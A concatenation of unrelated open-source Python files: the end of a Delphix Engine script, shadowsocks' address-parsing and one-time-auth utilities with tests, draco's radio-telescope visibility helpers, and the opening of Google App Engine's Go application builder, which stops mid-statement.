we have actionable data
"""
elapsed_minutes = time_elapsed()
print_exception('A job failed in the Delphix Engine')
print_info('{} took {:.2f} minutes to get this far:\n{}\n'.format(
basename(__file__), elapsed_minutes, e))
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info('{} took {:.2f} minutes to get this far\n'.format(
basename(__file__), elapsed_minutes))
except:
"""
Everything else gets caught here
"""
print_exception(sys.exc_info()[0])
elapsed_minutes = time_elapsed()
print_info('{} took {:.2f} minutes to get this far\n'.format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main(arguments)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import socket
import struct
import logging
import hashlib
import hmac
ONETIMEAUTH_BYTES = 10
ONETIMEAUTH_CHUNK_BYTES = 12
ONETIMEAUTH_CHUNK_DATA_LEN = 2
def sha1_hmac(secret, data):
return hmac.new(secret, data, hashlib.sha1).digest()
def onetimeauth_verify(_hash, data, key):
return _hash == sha1_hmac(key, data)[:ONETIMEAUTH_BYTES]
def onetimeauth_gen(data, key):
return sha1_hmac(key, data)[:ONETIMEAUTH_BYTES]
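# Illustrative helper (not part of the original module): the one-time-auth
# tag is the first ONETIMEAUTH_BYTES bytes of HMAC-SHA1(key, data), so a tag
# produced by onetimeauth_gen always passes onetimeauth_verify.
def _example_onetimeauth_roundtrip():
    key, data = b'secret-key', b'payload'
    tag = onetimeauth_gen(data, key)
    assert len(tag) == ONETIMEAUTH_BYTES
    assert onetimeauth_verify(tag, data, key)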
def compat_ord(s):
if type(s) == int:
return s
return _ord(s)
def compat_chr(d):
if bytes == str:
return _chr(d)
return bytes([d])
_ord = ord
_chr = chr
ord = compat_ord
chr = compat_chr
def to_bytes(s):
if bytes != str:
if type(s) == str:
return s.encode('utf-8')
return s
def to_str(s):
if bytes != str:
if type(s) == bytes:
return s.decode('utf-8')
return s
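# Illustrative round trip (example values assumed, not part of the original
# module): to_bytes/to_str convert between text and bytes on Python 3 and are
# effectively no-ops on Python 2, where bytes is str.
def _example_bytes_str_roundtrip():
    assert to_str(to_bytes(u'example')) == u'example'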
def inet_ntop(family, ipstr):
if family == socket.AF_INET:
return to_bytes(socket.inet_ntoa(ipstr))
elif family == socket.AF_INET6:
import re
v6addr = ':'.join(('%02X%02X' % (ord(i), ord(j))).lstrip('0')
for i, j in zip(ipstr[::2], ipstr[1::2]))
v6addr = re.sub('::+', '::', v6addr, count=1)
return to_bytes(v6addr)
def inet_pton(family, addr):
addr = to_str(addr)
if family == socket.AF_INET:
return socket.inet_aton(addr)
elif family == socket.AF_INET6:
if '.' in addr: # a v4 addr
v4addr = addr[addr.rindex(':') + 1:]
v4addr = socket.inet_aton(v4addr)
v4addr = map(lambda x: ('%02X' % ord(x)), v4addr)
v4addr.insert(2, ':')
newaddr = addr[:addr.rindex(':') + 1] + ''.join(v4addr)
return inet_pton(family, newaddr)
dbyts = [0] * 8 # 8 groups
grps = addr.split(':')
for i, v in enumerate(grps):
if v:
dbyts[i] = int(v, 16)
else:
for j, w in enumerate(grps[::-1]):
if w:
dbyts[7 - j] = int(w, 16)
else:
break
break
return b''.join((chr(i // 256) + chr(i % 256)) for i in dbyts)
else:
raise RuntimeError("What family?")
def is_ip(address):
for family in (socket.AF_INET, socket.AF_INET6):
try:
if type(address) != str:
address = address.decode('utf8')
inet_pton(family, address)
return family
except (TypeError, ValueError, OSError, IOError):
pass
return False
def patch_socket():
if not hasattr(socket, 'inet_pton'):
socket.inet_pton = inet_pton
if not hasattr(socket, 'inet_ntop'):
socket.inet_ntop = inet_ntop
patch_socket()
ADDRTYPE_IPV4 = 0x01
ADDRTYPE_IPV6 = 0x04
ADDRTYPE_HOST = 0x03
ADDRTYPE_AUTH = 0x10
ADDRTYPE_MASK = 0xF
def pack_addr(address):
address_str = to_str(address)
for family in (socket.AF_INET, socket.AF_INET6):
try:
r = socket.inet_pton(family, address_str)
if family == socket.AF_INET6:
return b'\x04' + r
else:
return b'\x01' + r
except (TypeError, ValueError, OSError, IOError):
pass
if len(address) > 255:
address = address[:255] # TODO
return b'\x03' + chr(len(address)) + address
def parse_header(data):
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype & ADDRTYPE_MASK == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 4 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
return addrtype, to_bytes(dest_addr), dest_port, header_length
class IPNetwork(object):
ADDRLENGTH = {socket.AF_INET: 32, socket.AF_INET6: 128, False: 0}
def __init__(self, addrs):
self._network_list_v4 = []
self._network_list_v6 = []
if type(addrs) == str:
addrs = addrs.split(',')
list(map(self.add_network, addrs))
def add_network(self, addr):
        if addr == "":
return
block = addr.split('/')
addr_family = is_ip(block[0])
addr_len = IPNetwork.ADDRLENGTH[addr_family]
        if addr_family == socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(block[0]))
        elif addr_family == socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, block[0]))
ip = (hi << 64) | lo
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
        if len(block) == 1:
prefix_size = 0
            while (ip & 1) == 0 and ip != 0:
ip >>= 1
prefix_size += 1
            logging.warn("You didn't specify a CIDR routing prefix size for %s, "
                         "implicitly treated as %s/%d" % (addr, addr, addr_len))
elif block[1].isdigit() and int(block[1]) <= addr_len:
prefix_size = addr_len - int(block[1])
ip >>= prefix_size
else:
raise Exception("Not a valid CIDR notation: %s" % addr)
        if addr_family == socket.AF_INET:
self._network_list_v4.append((ip, prefix_size))
else:
self._network_list_v6.append((ip, prefix_size))
def __contains__(self, addr):
addr_family = is_ip(addr)
        if addr_family == socket.AF_INET:
ip, = struct.unpack("!I", socket.inet_aton(addr))
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v4))
        elif addr_family == socket.AF_INET6:
hi, lo = struct.unpack("!QQ", inet_pton(addr_family, addr))
ip = (hi << 64) | lo
return any(map(lambda n_ps: n_ps[0] == ip >> n_ps[1],
self._network_list_v6))
else:
return False
def test_inet_conv():
ipv4 = b'8.8.4.4'
b = inet_pton(socket.AF_INET, ipv4)
assert inet_ntop(socket.AF_INET, b) == ipv4
ipv6 = b'2404:6800:4005:805::1011'
b = inet_pton(socket.AF_INET6, ipv6)
assert inet_ntop(socket.AF_INET6, b) == ipv6
def test_parse_header():
assert parse_header(b'\x03\x0ewww.google.com\x00\x50') == \
(3, b'www.google.com', 80, 18)
assert parse_header(b'\x01\x08\x08\x08\x08\x00\x35') == \
(1, b'8.8.8.8', 53, 7)
assert parse_header((b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00'
b'\x00\x10\x11\x00\x50')) == \
(4, b'2404:6800:4005:805::1011', 80, 19)
def test_pack_header():
assert pack_addr(b'8.8.8.8') == b'\x01\x08\x08\x08\x08'
assert pack_addr(b'2404:6800:4005:805::1011') == \
b'\x04$\x04h\x00@\x05\x08\x05\x00\x00\x00\x00\x00\x00\x10\x11'
assert pack_addr(b'www.google.com') == b'\x03\x0ewww.google.com'
def test_ip_network():
ip_network = IPNetwork('127.0.0.0/24,::ff:1/112,::1,192.168.1.1,192.0.2.0')
assert '127.0.0.1' in ip_network
assert '127.0.1.1' not in ip_network
assert ':ff:ffff' in ip_network
assert '::ffff:1' not in ip_network
assert '::1' in ip_network
assert '::2' not in ip_network
assert '192.168.1.1' in ip_network
assert '192.168.1.2' not in ip_network
assert '192.0.2.1' in ip_network
assert '192.0.3.1' in ip_network # 192.0.2.0 is treated as 192.0.2.0/23
assert 'www.google.com' not in ip_network
if __name__ == '__main__':
test_inet_conv()
test_parse_header()
test_pack_header()
test_ip_network()
|
|
"""Collection of miscellaneous routines.
Miscellaneous tasks should be placed in :py:mod:`draco.core.misc`.
"""
import numpy as np
from numpy.lib.recfunctions import structured_to_unstructured
from ._fast_tools import _calc_redundancy
def cmap(i, j, n):
"""Given a pair of feed indices, return the pair index.
Parameters
----------
i, j : integer
Feed index.
n : integer
Total number of feeds.
Returns
-------
pi : integer
Pair index.
"""
if i <= j:
return (n * (n + 1) // 2) - ((n - i) * (n - i + 1) // 2) + (j - i)
else:
return cmap(j, i, n)
def icmap(ix, n):
"""Inverse feed map.
Parameters
----------
ix : integer
Pair index.
n : integer
Total number of feeds.
Returns
-------
fi, fj : integer
Feed indices.
"""
for ii in range(n):
if cmap(ii, n - 1, n) >= ix:
break
i = ii
j = ix - cmap(i, i, n) + i
return i, j
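# Illustrative check (assumed n=3 feeds, not part of the original module):
# cmap enumerates the upper triangle row by row and icmap inverts the mapping.
def _example_cmap_roundtrip(n=3):
    for ix in range(n * (n + 1) // 2):
        i, j = icmap(ix, n)
        assert cmap(i, j, n) == ix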
def find_key(key_list, key):
"""Find the index of a key in a list of keys.
This is a wrapper for the list method `index`
    that can search any iterable (not just lists)
and will return None if the key is not found.
Parameters
----------
key_list : iterable
key : object to be searched
Returns
-------
index : int or None
The index of `key` in `key_list`.
If `key_list` does not contain `key`,
then None is returned.
"""
try:
return [tuple(x) for x in key_list].index(tuple(key))
except TypeError:
return list(key_list).index(key)
except ValueError:
return None
def find_keys(key_list, keys, require_match=False):
"""Find the indices of keys into a list of keys.
Parameters
----------
key_list : iterable
keys : iterable
require_match : bool
Require that `key_list` contain every element of `keys`,
and if not, raise ValueError.
Returns
-------
indices : list of int or None
List of the same length as `keys` containing
the indices of `keys` in `key_list`. If `require_match`
is False, then this can also contain None for keys
that are not contained in `key_list`.
"""
# Significantly faster than repeated calls to find_key
try:
dct = {tuple(kk): ii for ii, kk in enumerate(key_list)}
index = [dct.get(tuple(key)) for key in keys]
except TypeError:
dct = {kk: ii for ii, kk in enumerate(key_list)}
index = [dct.get(key) for key in keys]
if require_match and any([ind is None for ind in index]):
raise ValueError("Could not find all of the keys.")
else:
return index
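# Illustrative usage (hypothetical keys, not part of the original module):
# indices come back in the order of `keys`, with None for entries missing
# from `key_list` when require_match is False.
def _example_find_keys():
    key_list = [(0, 1), (0, 2), (1, 2)]
    assert find_key(key_list, (0, 2)) == 1
    assert find_keys(key_list, [(1, 2), (9, 9)]) == [2, None]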
def find_inputs(input_index, inputs, require_match=False):
"""Find the indices of inputs into a list of inputs.
This behaves similarly to `find_keys` but will automatically choose the key to
match on.
Parameters
----------
input_index : np.ndarray
inputs : np.ndarray
require_match : bool
Require that `input_index` contain every element of `inputs`,
and if not, raise ValueError.
Returns
-------
indices : list of int or None
List of the same length as `inputs` containing
        the indices of `inputs` in `input_index`. If `require_match`
is False, then this can also contain None for inputs
that are not contained in `input_index`.
"""
# Significantly faster than repeated calls to find_key
if "correlator_input" in input_index.dtype.fields:
field_to_match = "correlator_input"
elif "chan_id" in input_index.dtype.fields:
field_to_match = "chan_id"
else:
raise ValueError(
"`input_index` must have either a `chan_id` or `correlator_input` field."
)
if field_to_match not in inputs.dtype.fields:
raise ValueError("`inputs` array does not have a `%s` field." % field_to_match)
return find_keys(
input_index[field_to_match], inputs[field_to_match], require_match=require_match
)
def apply_gain(vis, gain, axis=1, out=None, prod_map=None):
"""Apply per input gains to a set of visibilities packed in upper
triangular format.
This allows us to apply the gains while minimising the intermediate
products created.
Parameters
----------
vis : np.ndarray[..., nprod, ...]
Array of visibility products.
gain : np.ndarray[..., ninput, ...]
Array of gains. One gain per input.
axis : integer, optional
The axis along which the inputs (or visibilities) are
contained.
out : np.ndarray
Array to place output in. If :obj:`None` create a new
array. This routine can safely use `out = vis`.
prod_map : ndarray of integer pairs
Gives the mapping from product axis to input pairs. If not supplied,
:func:`icmap` is used.
Returns
-------
out : np.ndarray
Visibility array with gains applied. Same shape as :obj:`vis`.
"""
nprod = vis.shape[axis]
ninput = gain.shape[axis]
if prod_map is None and nprod != (ninput * (ninput + 1) // 2):
raise Exception("Number of inputs does not match the number of products.")
if prod_map is not None:
if len(prod_map) != nprod:
msg = "Length of *prod_map* does not match number of input" " products."
raise ValueError(msg)
# Could check prod_map contents as well, but the loop should give a
# sensible error if this is wrong, and checking is expensive.
else:
prod_map = [icmap(pp, ninput) for pp in range(nprod)]
if out is None:
out = np.empty_like(vis)
elif out.shape != vis.shape:
raise Exception("Output array is wrong shape.")
# Define slices for use in gain & vis selection & combination
gain_vis_slice = tuple(slice(None) for i in range(axis))
# Iterate over input pairs and set gains
for pp in range(nprod):
# Determine the inputs.
ii, ij = prod_map[pp]
# Fetch the gains
gi = gain[gain_vis_slice + (ii,)]
gj = gain[gain_vis_slice + (ij,)].conj()
# Apply the gains and save into the output array.
out[gain_vis_slice + (pp,)] = vis[gain_vis_slice + (pp,)] * gi * gj
return out
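# Minimal sketch (assumed shapes, not part of the original module): with 3
# inputs there are 6 upper-triangle products along axis=1, and applying unit
# gains leaves the visibilities unchanged.
def _example_apply_gain():
    nfreq, ninput, ntime = 2, 3, 4
    nprod = ninput * (ninput + 1) // 2
    vis = np.ones((nfreq, nprod, ntime), dtype=np.complex64)
    gain = np.ones((nfreq, ninput, ntime), dtype=np.complex64)
    assert np.allclose(apply_gain(vis, gain), vis)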
def invert_no_zero(x):
"""Return the reciprocal, but ignoring zeros.
Where `x != 0` return 1/x, or just return 0. Importantly this routine does
not produce a warning about zero division.
Parameters
----------
x : np.ndarray
Returns
-------
r : np.ndarray
Return the reciprocal of x.
"""
if not isinstance(x, (np.generic, np.ndarray)):
cond = x == 0
elif np.iscomplexobj(x):
tol = 1.0 / np.finfo(x.real.dtype).max
cond = np.logical_and(np.abs(x.real) < tol, np.abs(x.imag) < tol)
else:
tol = 1.0 / np.finfo(x.dtype).max
cond = np.abs(x) < tol
with np.errstate(divide="ignore", invalid="ignore", over="ignore"):
return np.where(cond, 0.0, 1.0 / x)
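# Illustrative behaviour (not part of the original module): zero entries map
# to zero rather than raising a divide-by-zero warning.
def _example_invert_no_zero():
    x = np.array([2.0, 0.0, -4.0])
    assert np.allclose(invert_no_zero(x), [0.5, 0.0, -0.25])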
def extract_diagonal(utmat, axis=1):
"""Extract the diagonal elements of an upper triangular array.
Parameters
----------
utmat : np.ndarray[..., nprod, ...]
Upper triangular array.
axis : int, optional
Axis of array that is upper triangular.
Returns
-------
diag : np.ndarray[..., ninput, ...]
Diagonal of the array.
"""
# Estimate nside from the array shape
nside = int((2 * utmat.shape[axis]) ** 0.5)
# Check that this nside is correct
if utmat.shape[axis] != (nside * (nside + 1) // 2):
        msg = (
            "Array length (%i) of axis %i does not correspond to the upper "
            "triangle of a square matrix"
            % (utmat.shape[axis], axis)
        )
raise RuntimeError(msg)
# Find indices of the diagonal
diag_ind = [cmap(ii, ii, nside) for ii in range(nside)]
# Construct slice objects representing the axes before and after the product axis
slice0 = (np.s_[:],) * axis
slice1 = (np.s_[:],) * (len(utmat.shape) - axis - 1)
# Extract wanted elements with a giant slice
sl = slice0 + (diag_ind,) + slice1
diag_array = utmat[sl]
return diag_array
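# Illustrative check (assumed 3-input packing, not part of the original
# module): products are ordered (0,0), (0,1), (0,2), (1,1), (1,2), (2,2),
# so the diagonal sits at indices 0, 3 and 5 of the product axis.
def _example_extract_diagonal():
    utmat = np.arange(6)[np.newaxis, :]  # shape (1, nprod) with axis=1
    assert list(extract_diagonal(utmat, axis=1)[0]) == [0, 3, 5]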
def calculate_redundancy(input_flags, prod_map, stack_index, nstack):
"""Calculates the number of redundant baselines that were stacked
to form each unique baseline, accounting for the fact that some fraction
of the inputs are flagged as bad at any given time.
Parameters
----------
input_flags : np.ndarray [ninput, ntime]
Array indicating which inputs were good at each time.
Non-zero value indicates that an input was good.
prod_map: np.ndarray[nprod]
The products that were included in the stack.
Typically found in the `index_map['prod']` attribute of the
`containers.TimeStream` or `containers.SiderealStream` object.
stack_index: np.ndarray[nprod]
The index of the stack axis that each product went into.
Typically found in `reverse_map['stack']['stack']` attribute
of the `containers.Timestream` or `containers.SiderealStream` object.
nstack: int
Total number of unique baselines.
Returns
-------
redundancy : np.ndarray[nstack, ntime]
Array indicating the total number of redundant baselines
with good inputs that were stacked into each unique baseline.
"""
ninput, ntime = input_flags.shape
redundancy = np.zeros((nstack, ntime), dtype=np.float32)
if not np.any(input_flags):
input_flags = np.ones_like(input_flags)
input_flags = np.ascontiguousarray(input_flags.astype(np.float32, copy=False))
pm = structured_to_unstructured(prod_map, dtype=np.int16)
stack_index = np.ascontiguousarray(stack_index.astype(np.int32, copy=False))
# Call fast cython function to do calculation
_calc_redundancy(input_flags, pm, stack_index, nstack, redundancy)
return redundancy
def redefine_stack_index_map(telescope, inputs, prod, stack, reverse_stack):
"""Ensure baselines between unmasked inputs are used to represent each stack.
Parameters
----------
telescope : :class: `drift.core.telescope`
Telescope object containing feed information.
inputs : np.ndarray[ninput,] of dtype=('correlator_input', 'chan_id')
The 'correlator_input' or 'chan_id' of the inputs in the stack.
prod : np.ndarray[nprod,] of dtype=('input_a', 'input_b')
The correlation products as pairs of inputs.
stack : np.ndarray[nstack,] of dtype=('prod', 'conjugate')
The index into the `prod` axis of a characteristic baseline included in the stack.
reverse_stack : np.ndarray[nprod,] of dtype=('stack', 'conjugate')
The index into the `stack` axis that each `prod` belongs.
Returns
-------
stack_new : np.ndarray[nstack,] of dtype=('prod', 'conjugate')
The updated `stack` index map, where each element is an index to a product
consisting of a pair of unmasked inputs.
stack_flag : np.ndarray[nstack,] of dtype=np.bool
Boolean flag that is True if this element of the stack index map is now valid,
and False if none of the baselines that were stacked contained unmasked inputs.
"""
# Determine mapping between inputs in the index_map and
# inputs in the telescope instance
tel_index = find_inputs(telescope.input_index, inputs, require_match=False)
# Create a copy of the stack axis
stack_new = stack.copy()
    stack_flag = np.zeros(stack_new.size, dtype=bool)
# Loop over the stacked baselines
for sind, (ii, jj) in enumerate(prod[stack["prod"]]):
bi, bj = tel_index[ii], tel_index[jj]
        # Check that the representative pair of inputs is present
# in the telescope instance and not masked.
if (bi is None) or (bj is None) or not telescope.feedmask[bi, bj]:
# Find alternative pairs of inputs using the reverse map
this_stack = np.flatnonzero(reverse_stack["stack"] == sind)
# Loop over alternatives until we find an acceptable pair of inputs
for ts in this_stack:
tp = prod[ts]
ti, tj = tel_index[tp[0]], tel_index[tp[1]]
if (ti is not None) and (tj is not None) and telescope.feedmask[ti, tj]:
stack_new[sind]["prod"] = ts
stack_new[sind]["conjugate"] = reverse_stack[ts]["conjugate"]
stack_flag[sind] = True
break
else:
stack_flag[sind] = True
return stack_new, stack_flag
def polarization_map(index_map, telescope, exclude_autos=True):
"""Map the visibilities corresponding to entries in
pol = ['XX', 'XY', 'YX', 'YY'].
Parameters
----------
index_map : h5py.group or dict
Index map to map into polarizations. Must contain a `stack`
entry and an `input` entry.
telescope : :class: `drift.core.telescope`
Telescope object containing feed information.
exclude_autos: bool
If True (default), auto-correlations are set to -1.
Returns
-------
polmap : array of int
Array of size `nstack`. Each entry is the index to the
corresponding polarization in pol = ['XX', 'XY', 'YX', 'YY']
"""
# Old versions of telescope object don't have the `stack_type`
# attribute. Assume those are of type `redundant`.
try:
teltype = telescope.stack_type
except AttributeError:
teltype = None
msg = (
"Telescope object does not have a `stack_type` attribute.\n"
+ "Assuming it is of type `redundant`"
)
if teltype is not None:
if not (teltype == "redundant"):
msg = "Telescope stack type needs to be 'redundant'. Is {0}"
raise RuntimeError(msg.format(telescope.stack_type))
# Older data's input map has a simpler dtype
try:
input_map = index_map["input"]["chan_id"][:]
except IndexError:
input_map = index_map["input"][:]
pol = ["XX", "XY", "YX", "YY"]
nstack = len(index_map["stack"])
# polmap: indices of each vis product in
    # polarization list: ['XX', 'XY', 'YX', 'YY']
polmap = np.zeros(nstack, dtype=int)
# For each entry in stack
for vi in range(nstack):
# Product index
pi = index_map["stack"][vi][0]
# Inputs that go into this product
ipt0 = input_map[index_map["prod"][pi][0]]
ipt1 = input_map[index_map["prod"][pi][1]]
# Exclude autos if exclude_autos == True
if exclude_autos and (ipt0 == ipt1):
polmap[vi] = -1
continue
# Find polarization of first input
if telescope.beamclass[ipt0] == 0:
polstring = "X"
elif telescope.beamclass[ipt0] == 1:
polstring = "Y"
else:
# Not a CHIME feed or not On. Ignore.
polmap[vi] = -1
continue
# Find polarization of second input and add it to polstring
if telescope.beamclass[ipt1] == 0:
polstring += "X"
elif telescope.beamclass[ipt1] == 1:
polstring += "Y"
else:
# Not a CHIME feed or not On. Ignore.
polmap[vi] = -1
continue
# If conjugate, flip polstring ('XY -> 'YX)
if telescope.feedconj[ipt0, ipt1]:
polstring = polstring[::-1]
# Populate polmap
polmap[vi] = pol.index(polstring)
return polmap
def baseline_vector(index_map, telescope):
"""Baseline vectors in meters.
Parameters
----------
index_map : h5py.group or dict
Index map to map into polarizations. Must contain a `stack`
entry and an `input` entry.
telescope : :class: `drift.core.telescope`
Telescope object containing feed information.
Returns
-------
bvec_m : array
Array of shape (2, nstack). The 2D baseline vector
(in meters) for each visibility in index_map['stack']
"""
nstack = len(index_map["stack"])
# Baseline vectors in meters.
bvec_m = np.zeros((2, nstack), dtype=np.float64)
# Older data's input map has a simpler dtype
try:
input_map = index_map["input"]["chan_id"][:]
except IndexError:
input_map = index_map["input"][:]
# Compute all baseline vectors.
for vi in range(nstack):
# Product index
pi = index_map["stack"][vi][0]
# Inputs that go into this product
ipt0 = input_map[index_map["prod"][pi][0]]
ipt1 = input_map[index_map["prod"][pi][1]]
        # Baseline vector in meters
unique_index = telescope.feedmap[ipt0, ipt1]
bvec_m[:, vi] = telescope.baselines[unique_index]
# No need to conjugate. Already done in telescope.baselines.
# if telescope.feedconj[ipt0, ipt1]:
# bvec_m[:, vi] *= -1.
return bvec_m
def window_generalised(x, window="nuttall"):
"""A generalised high-order window at arbitrary locations.
Parameters
----------
x : np.ndarray[n]
Location to evaluate at. Values outside the range 0 to 1 are zero.
    window : one of {'uniform', 'hann', 'hanning', 'hamming', 'blackman',
                     'nuttall', 'blackman_nuttall', 'blackman_harris'}
Type of window function to return.
Returns
-------
w : np.ndarray[n]
Window function.
"""
a_table = {
"uniform": np.array([1, 0, 0, 0]),
"hann": np.array([0.5, -0.5, 0, 0]),
"hanning": np.array([0.5, -0.5, 0, 0]),
"hamming": np.array([0.53836, -0.46164, 0, 0]),
"blackman": np.array([0.42, -0.5, 0.08, 0]),
"nuttall": np.array([0.355768, -0.487396, 0.144232, -0.012604]),
"blackman_nuttall": np.array([0.3635819, -0.4891775, 0.1365995, -0.0106411]),
"blackman_harris": np.array([0.35875, -0.48829, 0.14128, -0.01168]),
}
a = a_table[window]
t = 2 * np.pi * np.arange(4)[:, np.newaxis] * x[np.newaxis, :]
w = (a[:, np.newaxis] * np.cos(t)).sum(axis=0)
w = np.where((x >= 0) & (x <= 1), w, 0)
return w
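# Illustrative evaluation (assumed sample points, not part of the original
# module): the Nuttall window is essentially zero at the edges of [0, 1]
# and peaks at the centre.
def _example_window_generalised():
    x = np.array([0.0, 0.5, 1.0])
    w = window_generalised(x, window="nuttall")
    assert abs(w[0]) < 1e-6 and abs(w[2]) < 1e-6
    assert np.argmax(w) == 1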
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""An abstraction around the source and executable for a Go application."""
import atexit
import errno
import logging
import os
import os.path
import shutil
import sys
import subprocess
import tempfile
import google
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import safe_subprocess
_SDKROOT = os.path.dirname(os.path.dirname(google.__file__))
_GOROOT = os.path.join(_SDKROOT, 'goroot')
_GAB_PATH = os.path.join(_GOROOT, 'bin', 'go-app-builder')
if sys.platform.startswith('win'):
_GAB_PATH += '.exe'
def _rmtree(directory):
try:
shutil.rmtree(directory)
except:
pass
class BuildError(errors.Error):
"""Building the GoApplication failed."""
class GoApplication(object):
"""An abstraction around the source and executable for a Go application."""
def __init__(self, module_configuration):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
"""
self._module_configuration = module_configuration
self._go_file_to_mtime = {}
self._extras_hash = None
self._go_executable = None
self._work_dir = None
self._arch = self._get_architecture()
@property
def go_executable(self):
"""The path to the Go executable. None if it has not been built."""
return self._go_executable
  def get_environment(self):
    """Return the environment that should be used to run the Go executable."""
environ = {'GOROOT': _GOROOT,
'PWD': self._module_configuration.application_root,
'TZ': 'UTC'}
if 'SYSTEMROOT' in os.environ:
environ['SYSTEMROOT'] = os.environ['SYSTEMROOT']
if 'USER' in os.environ:
environ['USER'] = os.environ['USER']
return environ
@staticmethod
def _get_architecture():
architecture_map = {
'arm': '5',
'amd64': '6',
'386': '8',
}
for platform in os.listdir(os.path.join(_GOROOT, 'pkg', 'tool')):
# Look for 'linux_amd64', 'windows_386', etc.
if '_' not in platform:
continue
architecture = platform.split('_', 1)[1]
if architecture in architecture_map:
return architecture_map[architecture]
    raise BuildError('no compiler found in goroot (%s)' % _GOROOT)
def _get_gab_args(self):
# Go's regexp package does not implicitly anchor to the start.
nobuild_files = '^' + str(self._module_configuration.nobuild_files)
gab_args = [
_GAB_PATH,
'-app_base', self._module_configuration.application_root,
'-arch', self._arch,
'-binary_name', '_go_app',
'-dynamic',
'-extra_imports', 'appengine_internal/init',
'-goroot', _GOROOT,
'-nobuild_files', nobuild_files,
'-unsafe',
'-work_dir', self._work_dir]
if 'GOPATH' in os.environ:
gab_args.extend(['-gopath', os.environ['GOPATH']])
return gab_args
def _get_go_files_to_mtime(self):
"""Returns a dict mapping all Go files to their mtimes.
Returns:
A dict mapping the path relative to the application root of every .go
file in the application root, or any of its subdirectories, to the file's
modification time.
"""
go_file_to_mtime = {}
for root, _, file_names in os.walk(
self._module_configuration.application_root):
for file_name in file_names:
if not file_name.endswith('.go'):
continue
full_path = os.path.join(root, file_name)
rel_path = os.path.relpath(
full_path, self._module_configuration.application_root)
if self._module_configuration.skip_files.match(rel_path):
continue
if self._module_configuration.nobuild_files.match(rel_path):
continue
try:
go_file_to_mtime[rel_path] = os.path.getmtime(full_path)
except OSError as e:
# Ignore deleted files.
if e.errno != errno.ENOENT:
raise
return go_file_to_mtime
def _get_extras_hash(self):
"""Returns a hash of the names and mtimes of package dependencies.
Returns:
Returns a string representing a hash.
Raises:
BuildError: if the go application builder fails.
"""
gab_args = self._get_gab_args()
gab_args.append('-print_extras_hash')
gab_args.extend(self._go_file_to_mtime)
gab_process = safe_subprocess.start_process(gab_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={})
gab_stdout, gab_stderr = gab_process.communicate()
if gab_process.returncode:
raise BuildError(
'%s\n\n(Executed command: %s)' % (gab_stderr,
' '.join(gab_args)))
else:
return gab_stdout
def _build(self):
assert self._go_file_to_mtime, 'no .go files'
logging.debug('Building Go application')
gab_args = self._get_gab_args()
gab_args.extend(self._go_file_to_mtime)
gab_process = safe_subprocess.start_process(gab_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={})
gab_stdout, gab_stderr = gab_process.communicate()
if gab_process.returncode:
raise BuildError(
'%s\n%s\n\n(Executed command: %s)' % (gab_stdout,
gab_stderr,
' '.join(gab_args)))
else:
logging.debug('Build succeeded:\n%s\n%s', gab_stdout, gab_stderr)
self._go_executable = os.path.join(self._work_dir, '_go_app')
def maybe_build(self, maybe_modified_since_last_build):
"""Builds an executable for the application if necessary.
Args:
maybe_modified_since_last_build: True if any files in the application root
or the GOPATH have changed since the last call to maybe_build, False
        otherwise. This argument is used to decide whether a build is required
or not.
Raises:
BuildError: if building the executable fails for any reason.
"""
if not self._work_dir:
self._work_dir = tempfile.mkdtemp('appengine-go-bin')
atexit.register(_rmtree, self._work_dir)
if not os.path.exists(_GAB_PATH):
# TODO: This message should be more useful i.e. point the
# user to an SDK that does have the right components.
raise BuildError('Required Go components are missing from the SDK.')
if self._go_executable and not maybe_modified_since_last_build:
return
(self._go_file_to_mtime,
old_go_file_to_mtime) = (self._get_go_files_to_mtime(),
self._go_file_to_mtime)
if not self._go_file_to_mtime:
raise BuildError('no .go files found in %s' %
